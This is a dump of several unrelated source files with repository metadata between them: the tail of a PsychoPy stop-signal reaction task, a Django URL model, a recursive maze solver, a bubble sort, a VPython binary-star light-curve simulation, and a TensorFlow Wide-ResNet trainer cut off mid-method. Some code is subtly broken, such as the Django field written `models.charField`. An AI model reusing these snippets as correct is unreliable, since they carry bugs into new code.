text="Correct!\nYou withheld your response" , units='cm')
wrongKey=visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
text="WrongKey - Please press the space key", units='cm' )
countdown_clock=core.Clock()
number_text = visual.TextStim(win, pos=[0, Target_pos],height=1, color=[-1,-1,-1], text="1", units='cm')
# -------------------- Countdown--------------------------------
# --------------------------------------------------------------
# A function to count down the start of the trial and warn if key is lifted too soon
def countdown():
countdown_clock.reset()
keydown=0
while int(countdown_clock.getTime())<4:
remainingKeys = kb.getKeys(keyList=['space', 'escape'], waitRelease=False, clear=False)
number_text.text="%s"%(3-int(countdown_clock.getTime()))
if remainingKeys:# if a key was pressed <------------------------make this specific to space once integrates
keydown=1
for key in remainingKeys:
if key.duration:
print(number_text.text)
keydown = 0 # a key has been lifted
kb.clearEvents () #clear the key events
kb.clock.reset() #reset the keyboard clock
TooSoon_text.draw() #tell the participant they lifted their finger too soon (during the countdown)
win.flip() # draw the "too soon" message
k = event.waitKeys() # wait for the key to be pressed again
if k[0]=='escape':#make sure the user can still quit in this loop
print('User pressed escape, quiting now')
win.close()
core.quit()
countdown_clock.reset() # reset the countdown clock
Bar.draw()
fillBar.draw()
if taskInfo_brief['Spaceship']:
Spaceship.draw()
targetArrowRight.draw()
targetArrowLeft.draw()
if int(countdown_clock.getTime())<3:
number_text.draw()
win.flip()
# ----------------- Filling bar---------------------------------
# --------------------------------------------------------------
# Specify the filling and static bar
bar_width_vert1=0-(taskInfo['Bar width (cm)']/2)
bar_width_vert2=(taskInfo['Bar width (cm)']/2)
# "vert" = vertices (corners) of filling bar in x y coordinates ([0, 0] = centre)
vert = [(bar_width_vert1,0-taskInfo['Bar base below fixation (cm)']), (bar_width_vert1,0-taskInfo['Bar base below fixation (cm)']+.01),
(bar_width_vert2,0-taskInfo['Bar base below fixation (cm)']+.01), (bar_width_vert2,0-taskInfo['Bar base below fixation (cm)'])]
original_vert=vert
fillBar= visual.ShapeStim(win, fillColor='skyblue', lineWidth=0, opacity=1, units='cm', vertices=vert)
# ------------------ Static bar---------------------------------
# --------------------------------------------------------------
# "fullvert" = vertices of the static background bar
fullvert = [(bar_width_vert1,0-taskInfo['Bar base below fixation (cm)']),
(bar_width_vert1,taskInfo['Bar top above fixation (cm)']),
(bar_width_vert2,taskInfo['Bar top above fixation (cm)']),
(bar_width_vert2,0-taskInfo['Bar base below fixation (cm)'])]
Bar = visual.ShapeStim(win, vertices=fullvert, fillColor='white', lineWidth=0, opacity=1, units='cm')
# ------------------ Target line--------------------------------
# --------------------------------------------------------------
# Specify the target width
target_width = 0.5
# Vertices of the target arrows
targetArrowRightvert = [(1.5,Target_pos),
(1.5+target_width,Target_pos+(target_width/np.sqrt(3))),(1.5+target_width,Target_pos-(target_width/np.sqrt(3)))]
targetArrowRight = visual.ShapeStim(win, vertices=targetArrowRightvert, fillColor='yellow', lineWidth=0, opacity=1, units='cm')
targetArrowLeftvert = [(-1.5-target_width,Target_pos+(target_width/np.sqrt(3))),(-1.5-target_width,Target_pos-(target_width/np.sqrt(3))),
(-1.5,Target_pos)]
targetArrowLeft = visual.ShapeStim(win, vertices=targetArrowLeftvert, fillColor='yellow', lineWidth=0, opacity=1, units='cm')
# ---------------------- Spaceship (optional) ------------------
# --------------------------------------------------------------
# Specify the spaceship object for if people want to use a spaceship
#How high is the spaceship in cm (set the position to be the
Spaceship_height_cm=2
#set it so that the line in the middle of the spaceship should eventually line up with the targetline
Spaceship=visual.ImageStim(win, image='Stimuli'+os.sep+'SpaceShip_scaled.png', pos=(0, vert[2][1]), units='cm')
Spaceship_practice_im=visual.ImageStim(win, image='Stimuli'+os.sep+'Practice_Image.png', pos=(10, 0), units='cm')
# --------------------------------------------------------------
# Initialize trials
#
# --------------------------------------------------------------
# --------------------------------------------------------------
#Trial loop
inc=0
height = 0
correct=[]
#keep track of feedback to give individual feedback at the end
feedback_list=[]
correct_gos=0
correct_StopSs=0
count=0
#"block_count" keeps track of how many blocks there have been
block_count=0
#"trial_count" keeps track of how many trials there have been
trial_count=0
practice=True
# ------------------- clocks ----------------------------------
# --------------------------------------------------------------
#draw instructions
Main_instructions.draw()
if taskInfo_brief['Spaceship']:
instr_image_SS.draw()
else:
instr_image.draw()
win.flip()
core.wait(1)
#wait for button press
event.waitKeys()
#give warning practice
if taskInfo_brief['Practice trials']:
practice_prepare.draw()
win.flip()
event.waitKeys()
ISI = 2
# --------------------------------------------------------------
# --------------------------------------------------------------
# START TRIALS
# --------------------------------------------------------------
# --------------------------------------------------------------
block_count=0 #blocks
for block in outerLoop:
print(block)
if block_count == 0 and taskInfo_brief['Practice trials']:
trials = data.TrialHandler(trialList = practiceGoConditions, nReps = 1, method = taskInfo_brief['Trial order'], name = 'practiceGoTrials',autoLog = True)
elif block_count ==1 and taskInfo_brief['Practice trials']:
trials = data.TrialHandler(trialList = practiceMixedConditions, nReps = 1, method = taskInfo_brief['Trial order'], name = 'practiceMixedTrials', autoLog = True)
else:
trials = trials = data.TrialHandler(trialList = conditions, nReps = 1, method = taskInfo_brief['Trial order'], name = 'testBlocks', autoLog = True)
#Note 1: nReps is the number of repetitions of the condition rows set in the 'practiceGoTrials', 'practiceMixedTrials' or 'TestConditions' file.
#Users can control the number of trials by increasing the number of rows per condition in the conditions file OR ...
#by changing the number of nReps. For example, if your conditions file has two rows (0 and 1), and your nReps is 3, you will have 6 trials
#We recommend users change the number of trials using the conditions file rather than nReps
#Note 2: method = 'random' randomly selects the conditions in the conditions files, you can also use 'sequential'
thisExp.addLoop(trials)
if block_count>2 and taskInfo_brief['Practice trials']:
#set message
Blocks_completed = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
text="Block %s of %s complete!!\n\nPress space when ready to continue!"%(block_count-prac_block_n, n_blocks-prac_block_n), units='cm')
Blocks_completed.draw()
win.flip()
core.wait(1)
#wait for keypress
event.waitKeys()
elif not taskInfo_brief['Practice trials'] and block_count>0:
#set message
Blocks_completed = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
text="Block %s of %s complete!!\n\nPress space when ready to continue!"%(block_count-prac_block_n, n_blocks-prac_block_n), units='cm')
Blocks_completed.draw()
win.flip()
core.wait(1)
#wait for keypress
event.waitKeys()
#note what block we are on
block_count=block_count+1
# ------------------- trial loop ------------------------------
# --------------------------------------------------------------
# On each iteration of the trial loop we will:
# 1. Check if this is the first block -> if it is did user request practice trials?
# -> if yes present go practice trials and stop practice trials (label as
# practice in output (i.e. "trial_label") --> check if they understood the task --> if yes continue
# 2. Set the position of the SSD based on if they were correct or not on previous trial
# 3. participant pushes key and we start the trial
# 4. trial complete compile feedback and save data
#iterate through the set of trials we have been given for this block
trial_count=0
for thisTrial in trials:
trial_count=trial_count+1 #count trials
#Reset the colour of the target arrows
targetArrowRight.fillColor='yellow'
targetArrowLeft.fillColor='yellow'
# ----------------------------------------------------------------------
# ------------------- 1. trial loop Check if the user asked for practice
#------------------------trials and if this is the first block
# ----------------------------------------------------------------------
if trial_count==1:
if trials.name == 'practiceGoTrials':
#draw practice "Go" trial instruction
practice_go_inst.draw()
trial_label='practice'
win.flip()
#wait for key press
event.waitKeys()
elif trials.name == 'practiceMixedTrials':
#draw practice "Stop" trial instruction
practice_stop_inst.draw()
trial_label='practice'
win.flip()
#wait for key press
core.wait(3)
event.waitKeys()
if trials.name == 'testBlocks' and ((taskInfo_brief['Practice trials'] and block_count==3) or (taskInfo_brief['Practice trials']==False and block_count==1)):
#If this is the first main trial (i.e. the trial count is 1 more than the practice trials)
#ask the participant if they understand the task.
understand.draw()
#Reset the stop time so it doesn't carry over from the practice
stoptime=taskInfo['StopS start pos. (seconds)']
#Reset correct as well so that the loop to change stoptimes is not entered
correct=[]
win.flip()
#wait for key press
UnderstandKey = event.waitKeys(keyList=['y','n'])
#check if the user understood the task, if not ('n') quit the task
if UnderstandKey[0] == 'n':
core.quit()
practice=False
trial_label='main'
trial_count=1
#reset the stop pos to be what it should be at the start
this_stoptime=trial_length
#print('this_stoptime:',this_stoptime)
trial_label=trials.name
# ---------------------------------------------------------------
# ------------------- 2. set position of SSD based on if previous
#------------------------response was correct
# ---------------------------------------------------------------
#Find out if/where the rising bar should stop on this trial based on accuracy in previous
if not taskInfo_brief['Method']=='fixed':
if correct==-1 and round(stoptime,3) > round(lower_ssd,3):#if they incorrectly lifted on a StopS trial (checking success count allows us to check if the trial restarted)
stoptime=stoptime-stepsize
elif correct == -1 and round(stoptime,3) == round(lower_ssd,3):
stoptime = lower_ssd
elif correct ==2 and round(stoptime,3) < round(upper_ssd,3):#if they correctly stopped on the StopS trial
stoptime=stoptime+stepsize
elif correct == 2 and round(stoptime,3) == round(upper_ssd,3):# never equal floats in python. so we use round.
stoptime = upper_ssd
elif taskInfo_brief['Method']=='fixed':
stoptime=thisTrial['fixedStopTime']
print(stoptime)
#reset correct
correct=[]
#set the stop time based on if this is a 'Go' or 'Stop' trial
#if Signal = 0, then trial type = Go,
#if Signal = 1, then trial type = Stop
#if this is a go trial, the stop time is the maximum trial time (i.e. time taken to fill bar)
Signal =thisTrial['Signal']
if Signal==0:
this_stoptime=trial_length
else:
this_stoptime = stoptime #stop time is the trial length - the time taken to travel from the target to the top - the current step size)
#print('this_stoptime:', this_stoptime)
# ---------------------------------------------------------------
# ------------------- 3. Participant pushes key
#---------------------- Start of trial
# ---------------------------------------------------------------
#draw instructions to hold key down
PressKey_instructions.draw()
win.flip()
#wait for keypress
kb.start() # we need to start watching the keyboard before a key is pressed
kb.clearEvents ()
k = event.waitKeys()
#check for if user wishes to esc
if k[0]=='escape':
print('User pressed escape, quiting now')
win.close()
core.quit()
#reset the vertices to their begining position
fillBar.vertices = original_vert#vert
if taskInfo_brief['Spaceship']:
Spaceship.pos=(0, original_vert[2][1])
#Count down before trial starts
if taskInfo_brief['Count down']:
countdown()
targetArrowRight.setAutoDraw(True)
targetArrowLeft.setAutoDraw(True)
Bar.setAutoDraw(True)
fillBar.setAutoDraw(True)
# Set autoDraw for the stimulus elements before trial starts
# (Note: draw order is defined by the order in which setAutoDraw is called)
if taskInfo_brief['Spaceship']:
Spaceship.setAutoDraw(True)
#Record the frame intervals for the interested user
win.frameIntervals=[]
win.recordFrameIntervals = True
#"waiting" = variable to say if we are waiting for the key to be lifted
waiting=1
height=0
#print('current vert:', vert[1][1])
time_elapsed=0#we want this to be 0 at this point
win.callOnFlip(kb.clock.reset)
win.flip()
#kb.clock.reset()
while time_elapsed<trial_length and waiting==1:#whilst we are waiting for the button to be lifted
# Watch the keyboard for a response
remainingKeys = kb.getKeys(keyList=['space', 'escape'], waitRelease=False, clear=False)
# How much time has elapsed since the start of the trial
time_elapsed=kb.clock.getTime()
# Calculate "height" - the current height of the bar in cm
# this will be added to the vertices position to adjust the size of
# the filling (blue) bar.
if time_elapsed<this_stoptime:
height = (time_elapsed*bar_height)/trial_length
elif time_elapsed>=this_stoptime:
height = (this_stoptime*bar_height)/trial_length#max_height
# If a key has been pressed (i.e. there is something in the keyboard events)
# we will draw the filling bar. This will stop if key lift detected.
if remainingKeys:
for key in remainingKeys:
if key.duration:
lift_time = kb.clock.getTime()
kd=key.duration
krt=key.rt
kd_start_synced=key.duration-np.abs((key.tDown-kb.clock.getLastResetTime()))#<----can just do key.duration - key.rt
#print('lift time:', lift_time, 'duration:', kd, 'duration_startsynced', kd_start_synced)
kb.clearEvents() #clear the key events
#say we are not waiting anymore and break the loop
waiting=0
#Set the vertices of the filling bar
vert[1]=(vert[1][0], vert[1][1]+height)#left corner
vert[2]=(vert[2][0], vert[2][1]+height)#right corner
# Optional print for debuggins (prints the coordinates of the top two vertices)
#print('y vertices top left:', vert[1][1])
#print('y vertices top right:', vert[2][1])
fillBar.vertices = vert
if taskInfo_brief['Spaceship']:
Spaceship.pos=(0, vert[2][1])
lastvert=vert[2]
# Reset vertices to original position
vert[1]=(vert[1][0], vert[1][1]-height)# left corner
vert[2]=(vert[2][0], vert[2][1]-height)# right corner
win.flip()
#stop recording frame intervals
win.recordFrameIntervals = False
#if this was a stop trial then the above while loop will have broken when the stoplimit was
#reached. but, we still want to wait untill the end of the trial to make sure they
#actually hold and don't lift as soon as the stop limit is reached
# ---------------------------------------------------------------
# ------------------- 4. trial complete
#---------------------- compile feedback and save data
# ---------------------------------------------------------------
kb.stop() # stop watching the keyboard
#if the bar has filled but we are still waiting for the key to lift
if waiting==1:
kd_start_synced='NaN'
# Optional prints for debugging
#print('trial length:',trial_length)
lifted=0#<-------------------------------------------Are the variables lifted
RT='NaN'
#if this was a go trial feedback that the participant incorrectly stopped
if Signal==0:
feedback=incorrectstop
# Change the colour of the target arrows
targetArrowRight.fillColor='Red'
targetArrowLeft.fillColor='Red'
correct=-2
# If this was a stop trial feedback that the participant correctly stopped
elif Signal==1:# The participant must have continued holding untill the end of the total trial length
correct=2
#change the colour of the target Arrows
targetArrowRight.fillColor='Green'
targetArrowLeft.fillColor='Green'
feedback=correctstop
correct_StopSs=correct_StopSs+1
# If the key was lifted before the bar filled
else:
# If this was a stop trial feedback that the participant incorrectly stopped
lifted=1
RT = lift_time
if Signal==0:# Give feedback they correctly lifted and time in ms from target
correct=1
feedback_synced = round(abs(((trial_length*.8)-lift_time)*1000)) #this used the kb.clock.getTime we used previously and saw was binned
targetArrowRight.fillColor='Green'
targetArrowLeft.fillColor='Green'
correctgo = visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
text="You stopped the bar \n %.0f ms from the target!"%(feedback_synced), units='cm') # <--------------------------- the ".8" is hard coded here - do we want it flexible this is the proportion of the trial time where the target is
feedback_list.append(feedback_synced)
if trial_label=="main":# Only add to the feedback if this is a main trial (i.e. dont count the practice trials)
correct_gos=correct_gos+1
feedback=correctgo
elif Signal==1:# Give feedback they incorrectly lifted -- and this is an unsuccessfull trial, so the trial should restart (it will be noted in the output that the trial restarted)
feedback=incorrectgo
targetArrowRight.fillColor='Red'
targetArrowLeft.fillColor='Red'
correct=-1
if taskInfo_brief['Trial by trial feedback']:
feedback.setAutoDraw(True)
win.flip()
if Signal == 0:
this_stoptime = 'NaN'
with open(Output+'.txt', 'a') as b:
b.write('%s %s %s %s %s %s %s\n'%(block_count, trial_label, trial_count, Signal, lifted, this_stoptime, kd_start_synced))
trials.addData('block', block_count)
trials.addData('trialType', trial_label)
trials.addData('trial', trial_count)
trials.addData('signal', Signal)
trials.addData('response', lifted)
trials.addData('ssd', this_stoptime)
trials.addData('rt', kd_start_synced)
thisExp.nextEntry()
core.wait(ISI)
# Reset visual stimuli for next trial
feedback.setAutoDraw(False)
targetArrowRight.setAutoDraw(False)
targetArrowLeft.setAutoDraw(False)
fillBar.setAutoDraw(False)
Bar.setAutoDraw(False)
if taskInfo_brief['Spaceship']:
Spaceship.setAutoDraw(False)
count=count+1# Only add to the trial could if we have been successfull
# Write a nice thank-you message and some feedback on performance
EndMessage = visual.TextStim(win, pos=[0, 0.4], height=.1, color=[1,1,1],
text="The End!\nThanks for taking part!\n[press a key to end]")
#text="The End!\n\nAverage time from target: %.3f\n\nCorrect Go: %s out of %s\n\nCorrect Stop: %s out of %s"%(
# np.average(feedback_list), correct_gos, taskInfo_brief['n_go_trials (per block)']*taskInfo_brief['n blocks'], correct_StopSs, taskInfo_brief['n_stop_trials (per block)']*taskInfo_brief['n blocks']))
# --------------------------------------------------------------
# --------------------------------------------------------------
# END TRIALS
# --------------------------------------------------------------
# --------------------------------------------------------------
#play fun video
mov = visual.MovieStim3(win, 'Stimuli/Astronaught_floss_test.mp4', size=(320, 240),
flipVert=False, flipHoriz=False, loop=False)
while mov.status != visual.FINISHED:
mov.draw()
EndMessage.draw()
win.flip()
if event.getKeys():
break
# Be nice and thank participant.
EndMessage.draw()
win.flip()
# Wait for button press
event.waitKeys()
core.quit()
|
[
"[email protected]"
] | |
a4ddd7673db772a7ff5ee0d63826c0d2cdc7cfa0
|
0e43b0550dce2a7d7ea3ffdcc1749dcee7dbdeac
|
/src/shortner/models.py
|
9fee1ec9941b3146c9c86f3ebbd909e7ea40b7f8
|
[] |
no_license
|
Ayukha/Trydjango
|
b9434395cf15438a112d471ab27ea02923791c4e
|
2fc164e86f96f23da3a2fc7987350ef7426c2f0d
|
refs/heads/master
| 2021-01-10T00:03:55.668319 | 2017-05-06T21:04:13 | 2017-05-06T21:04:13 | 90,490,885 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 225 |
py
|
from django.db import models
# Create your models here.
class kirrURL(models.Model):
url = models.charField(max_length=220,)
def __str__(self):
return str(self.url)
def __unicode__(self):
return str(self.url)
|
[
"[email protected]"
] | |
e82b39a461cefaaa07efebc35f4363d5803dc091
|
58eb959374c21feb80032705b593c8949913b9cd
|
/level3.py
|
301bafdbacd47c9c8d5929fa551ae72536fcb923
|
[] |
no_license
|
Legu/humanoid-hunt
|
7a9a027d68b92d17651b2e7f7f11a5259a9f601a
|
7d34f6f35a81287f501a0c5709d2015cbd7b6a85
|
refs/heads/master
| 2023-02-25T06:40:26.876483 | 2021-02-04T21:15:08 | 2021-02-04T21:15:08 | 336,081,952 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,067 |
py
|
from collections import defaultdict
import sys
sys.setrecursionlimit(1000000) # One MILLION coz why not
def solve(challenge):
maze = defaultdict(lambda: defaultdict(str))
for line in challenge.split('\n'):
if ' ' in line:
coord, moves = line.split(' ')
else:
coord = line
moves = ''
x, y = (int(a) for a in coord.split(','))
maze[x][y] = 'N'
for move in moves.split(','):
if move == 'X' or move == 'S' or move == 'F':
if move == 'S':
start = (x, y)
maze[x][y] = move
break
if move == 'U': y -= 1
if move == 'D': y += 1
if move == 'L': x -= 1
if move == 'R': x += 1
maze[x][y] = 'N'
return solve_maze(maze, start[0], start[1], '')
def solve_maze(maze, x, y, moves):
if not maze[x][y] or maze[x][y] == 'X' or maze[x][y] == 'V':
return None
if maze[x][y] == 'F':
return moves
maze[x][y] = 'V'
solution = solve_maze(maze, x, y - 1, moves + 'U') or \
solve_maze(maze, x, y + 1, moves + 'D') or \
solve_maze(maze, x - 1, y, moves + 'L') or \
solve_maze(maze, x + 1, y, moves + 'R')
return solution
|
[
"[email protected]"
] | |
e012673eb791002e37d6b08fb1782d403fc2a68b
|
1750af039bfd4324c12e581608ba4a3a902828cf
|
/bubble-sort.py
|
02ea889717850d8cf8f38e0de757eb9cc3ba35dd
|
[] |
no_license
|
Kevin-Kip/sorting-algorithms
|
1c0145fc3e3e63576e7440ebf756ab4e045e86d3
|
96b36f936c1263b5399ec77e291691afc0599e08
|
refs/heads/master
| 2020-03-26T03:30:12.145606 | 2018-08-12T10:56:46 | 2018-08-12T10:56:46 | 144,459,129 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 751 |
py
|
def bubble_sort(list_to_sort):
# Run through the array
# the -1 is for array indexing since indices start at 0
for i in range(0, len(list_to_sort) - 1):
# Run through the array again
# -1 again for indexing
# and -i to exclude the current item since it's already well-placed
for j in range(0, len(list_to_sort) - 1 - i):
# perform the swap of the item at the current position is greater than the next item
if list_to_sort[j] > list_to_sort[j + 1]:
list_to_sort[j], list_to_sort[j + 1] = list_to_sort[j + 1], list_to_sort[j]
return list_to_sort
if __name__ == "__main__":
# Replace the print with your own list
print(bubble_sort([5, 7, 3, 2, 1, 9, 0]))
|
[
"[email protected]"
] | |
19c3c70ea2d90226ad9cab7a86daaa37d89a199e
|
d0e79ff646811aad496df8e9537fef18b2f32d22
|
/kepler.py
|
edd3c51a4741ef1c84bf24444a0c3c9ad8ddfdd1
|
[] |
no_license
|
Kai-FengChen/ASIAA_Hackday
|
57bcad63b9edea2db7c11f812a726289bf0bfdf0
|
98e8e597f8a3c6e4594dc3615ececf0eb9ed95e1
|
refs/heads/master
| 2021-01-10T16:44:27.142706 | 2015-11-23T07:38:49 | 2015-11-23T07:38:49 | 46,537,567 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,022 |
py
|
from visual.controls import *
import ruler
from pylab import *
import scipy.interpolate
from visual import *
from visual.controls import *
from visual.graph import *
def get_func_for_luminosity(r_planet,r_star,scaling_factor):
r_planet = int(r_planet/scaling_factor)
r_star = int(r_star /scaling_factor)
full_area=zeros((r_star,r_star))
for x in range(r_star):
for y in range(r_star):
if x**2 + y**2 < r_star**2:
full_area[x,y]=1
r_planet_square = r_planet**2
sum_full_area_q = sum(full_area)
d_list=range(r_planet,r_star*2)
l_list=[]
for x_planet in d_list:
area=copy(full_area)
#print x_planet
x1=max(0 ,x_planet-r_planet)
x2=min(r_star-1,x_planet+r_planet)
for x in range(x1,x2):
for y in range(0,r_planet):
if (x-x_planet)**2+y**2 < r_planet_square:
area[x,y]=0.
luminosity=(sum(area)*2+sum_full_area_q*2)/(sum_full_area_q*4)
l_list.append(luminosity)
d_list.insert(0,0)
l_list.insert(0,l_list[0])
d_list=array(d_list)*scaling_factor
return scipy.interpolate.interp1d(d_list,l_list)
ll=get_func_for_luminosity(r_planet=1e10,r_star=4e10,scaling_factor=1e8)
giant = sphere()
giant.material = materials.emissive
giant.pos = vector(-1e11,0,0)
giant.radius = 4e10
giant.color = color.yellow
giant.mass = 4e30
dwarf = sphere()
dwarf.material = materials.earth
dwarf.pos = vector(1.5e11,0,0)
dwarf.radius = 1e10
dwarf.color = color.white
dwarf.mass = 1e29
dwarf.p = vector(0, 0, 2.6E4) * dwarf.mass
giant.p= -dwarf.p
initial = dwarf.pos.x
L = {}
'''def change(): # Called by controls when button clicked
if b.text == 'Click me':
b.text = 'Try again'
else:
b.text = 'Click me'
'''
'''c = controls() # Create controls window
# Create a button in the controls window:
b = slider( pos = (-50,0),
action=lambda: change() )'''
t = 0
for a in [giant, dwarf]:
a.orbit = curve(color=a.color, radius = 5e8)
dt = 86400
size = 0.025
R = 5
scene = display(title='Light curve', center = (0,0,0),width=400, height=450)
'''
camera = vector(0,0,R) # for generality; need not be at origin
# Place center of scene at a distance R from the camera:
# Point the camera:
scene.forward = scene.center-camera
# scene.fov is "field of view" in radians. R times the tangent
# of half the field of view is half of the width of the scene:
scene.range = R*tan(scene.fov/2)
scene.userspin = False
down = False
lastpos = None
'''
#ruler
ruler1 = ruler.ruler(vector(0, 0, 0), vector(2,0,0), unit = 0.1, length = 1.0, thickness = 0.01)
ruler2 = ruler.ruler(vector(0, 0, 0), vector(0,2,0), unit = 0.1, length = 1.1, thickness = 0.01)
#normal ball
ball = sphere(radius = size, color=color.white, make_trail=True) # ball
ball.pos = vector( 0.0, 1.0, 0.0)
ball.orbit = curve(color=color.cyan, radius = 0.01)
while 1:
rate(100)
'''
if scene.mouse.events:
m = scene.mouse.getevent()
if m.press == 'left':
down = True
elif m.release == 'left':
down = False
if down: # and scene.mouse.pos != lastpos:
lastpos = scene.mouse.pos
lastpos.y = 0 # force mouse position to have y=0
# (lastpos-camera) is a vector parallel to screen.
# (lastpos-camera) cross norm(forward) is a vector in the +y direction,
# and this y component of the cross product is proportional to
# how far to the right the mouse is (if mouse is to left, this y
# component is negative)
rotation = cross((lastpos-camera),norm(scene.forward))
# If the mouse is to the right, y component is positive, and we need to
# turn the view toward the right, which means rotating the forward
# vector toward the right, about the +y axis, which requires a
# negative angle (vice versa if mouse is to the left, in which case
# the cross product is in the -y direction. The factor of 1/100 was
# chosen experimentally as giving an appropriate sensitivity to how
# far to the right (or left) the mouse is. Bigger mouse displacement
# makes the rotation faster.
scene.forward = scene.forward.rotate(angle=-rotation.y/100, axis=(0,1,0))
# Move the center of the scene to be a distance R from the camera,
# in the direction of forward.
scene.center = camera+R*norm(scene.forward)'''
dist = dwarf.pos - giant.pos
distance = int(abs(dwarf.pos.x - giant.pos.x))
if distance < 2*giant.radius-5e9 and (dwarf.pos.z- giant.pos.z > 0):
print distance, ll(distance)
ball.pos.y = ll(distance)
else:
ball.pos.y = 1
force = 6.7e-11 * giant.mass * dwarf.mass / mag(dist)**2 * (dist/mag(dist))
giant.p = giant.p + force*dt
dwarf.p = dwarf.p - force*dt
for a in [giant, dwarf]:
a.pos = a.pos + a.p/a.mass * dt
a.orbit.append(pos=a.pos)
ball.pos.x=((t/30067200.)%1)
if (t<30067200):
ball.orbit.append(pos=ball.pos)
t += dt
|
[
"[email protected]"
] | |
91fa7b6d40e65ea18eb2197ca31dc47643533e46
|
e184ff3752870a2a4fc7c7c606ed54344085c431
|
/CIFAR/Wide_ResNet/Train.py
|
d075ed6c47f47373c426a6f3ed4a8a3838adc793
|
[] |
no_license
|
leesc912/ResNet
|
2538095c4564c8c17a8d27677ae64f0b7c5942b0
|
708693d966859f1620d1d71fe25dbd62d41cb31a
|
refs/heads/master
| 2020-12-30T08:27:28.053185 | 2020-02-18T14:04:32 | 2020-02-18T14:04:32 | 238,928,673 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,922 |
py
|
from pathlib import Path
import tensorflow as tf
from tensorflow.keras import backend as K
from Model import make_resnet
from Dataset import get_dataset
from Top_K_Accuracy import custom_top_k_metrics
from Save import Recoder
from Checkpoint import load_checkpoint
from Utils import create_folder, save_model_info
class Trainer() :
def __init__(self, **kwargs) :
if kwargs["test"] :
self.mode = "test"
elif kwargs["plot"] :
self.mode = "plot"
else :
self.mode = "train"
result_folder = kwargs["result_folder"]
if self.mode == "train" :
self.initial_epoch = 1
self.epochs = kwargs["epochs"]
self.lr = kwargs["lr"]
self.sgd_momentum = kwargs["sgd_momentum"]
self.num_category = kwargs["num_category"]
self.use_label_smoothing = kwargs["label_smoothing"]
if (kwargs["num_layers"] - 4) % (3 * kwargs["deepening_factor"]) :
raise Exception("({} - 4) % (3 * {}) != 0".format(kwargs["num_layers"], kwargs["deepening_factor"]))
if self.mode != "plot" :
self.ckpt_path = kwargs["ckpt_path"]
self.ckpt_epoch = kwargs["ckpt_epoch"]
log_folder, self.ckpt_folder = create_folder(result_folder)
if self.mode == "train" :
result_file = log_folder / "training_result.txt"
simple_result_file = log_folder / "training_result_summary.csv"
self.recoder = Recoder(result_file, simple_result_file)
top_k_file = log_folder / "top_k_accuracy.csv"
shortcut = "identity" if kwargs["zero_padding"] else "projection"
self.resnet = make_resnet(self.num_category, kwargs["num_layers"], kwargs["bn_momentum"], kwargs["widening_factor"],
kwargs["deepening_factor"], shortcut)
if self.mode == "test" :
_, _, self.test_dataset, _, _, self.num_test = get_dataset(kwargs["batch_size"], self.num_category, self.use_label_smoothing)
self.top_k_accuracy = custom_top_k_metrics(self.resnet, self.test_dataset, top_k_file, self.num_category, 10,
self.num_test, self.use_label_smoothing)
elif self.mode == "train" :
self.train_dataset, self.val_dataset, _, self.num_train, self.num_val, _ = get_dataset(kwargs["batch_size"], self.num_category,
self.use_label_smoothing)
self.top_k_accuracy = custom_top_k_metrics(self.resnet, self.val_dataset, top_k_file, self.num_category, 10,
self.num_val, self.use_label_smoothing)
# kwargs 값 저장
msg = ""
for k, v in list(kwargs.items()) :
msg += "{} = {}\n".format(k, v)
msg += "new model checkpoint path = {}\n".format(self.ckpt_folder)
with (log_folder / "model_settings.txt").open("w", encoding = "utf-8") as fp :
fp.write(msg)
save_model_info(self.resnet, log_folder)
def start(self) :
if self.mode == "test" :
self.test()
elif self.mode == "train" :
self.train()
def train(self) :
self.opt = tf.keras.optimizers.SGD(lr = self.lr, momentum = self.sgd_momentum, nesterov = True)
self.train_loss_metric = tf.keras.metrics.Mean(name = "train_loss")
if self.use_label_smoothing :
self.train_acc_metric = tf.keras.metrics.CategoricalAccuracy(name = "train_acc")
self.loss_function = tf.keras.losses.CategoricalCrossentropy(from_logits = True)
train_function = tf.function(self.forward, input_signature = [tf.TensorSpec((None, 32, 32, 3), tf.float32),
tf.TensorSpec((None, self.num_category), tf.float32)])
else :
self.train_acc_metric = tf.keras.metrics.SparseCategoricalAccuracy(name = "train_acc")
self.loss_function = tf.keras.losses.SparseCategoricalCrossentropy(from_logits = True)
train_function = tf.function(self.forward, input_signature = [tf.TensorSpec((None, 32, 32, 3), tf.float32),
tf.TensorSpec((None, 1), tf.int32)])
ckpt = tf.train.Checkpoint(model = self.resnet, opt = self.opt)
if self.ckpt_path is not None :
fname, self.initial_epoch = load_checkpoint(Path(self.ckpt_path).resolve(), self.ckpt_epoch)
print("\nCheckpoint File : {}\n".format(fname))
ckpt.mapped = {"model" : self.resnet, "opt" : self.opt}
ckpt.restore(fname)
K.set_value(self.opt.lr, self.lr)
progbar = tf.keras.utils.Progbar(target = self.num_train)
for epoch in range(self.initial_epoch, self.epochs + 1) :
self.train_loss_metric.reset_states()
self.train_acc_metric.reset_states()
self.recoder.set_start_train()
for X, y in self.train_dataset :
num_data = K.int_shape(y)[0]
train_function(X, y)
progbar.add(num_data)
self.recoder.set_end_train()
progbar.update(0)
self.recoder.set_start_val()
val_loss, val_acc = self.top_k_accuracy.evaluate(epoch)
self.recoder.set_end_val()
train_loss = self.train_loss_metric.result()
train_acc = self.train_acc_metric.result()
ckpt_prefix = self.ckpt_folder / "Epoch-{}_TLoss-{:.4f}_VLoss-{:.4f}".format(epoch, train_loss, val_loss)
ckpt.save(file_prefix = ckpt_prefix)
self.recoder.record(epoch, self.opt.get_config()["learning_rate"], train_acc.numpy(), train_loss.numpy(),
val_acc, val_loss.numpy())
def test(self) :
ckpt = tf.train.Checkpoint(model = self.resnet)
fname, _ = load_checkpoint(Path(self.ckpt_path).resolve(), self.ckpt_epoch)
print("\nCheckpoint File : {}\n".format(fname))
# model만 불러옴
ckpt.mapped = {"model" : self.resnet}
ckpt.restore(fname).expect_partial()
self.top_k_accuracy.evaluate("Test")
def forward(self, inputs, labels) :
with tf.GradientTape() as tape :
logits = self.resnet(inputs, training = True)
loss = self.loss_function(labels, logits)
grads = tape.gradient(loss, self.resnet.trainable_variables)
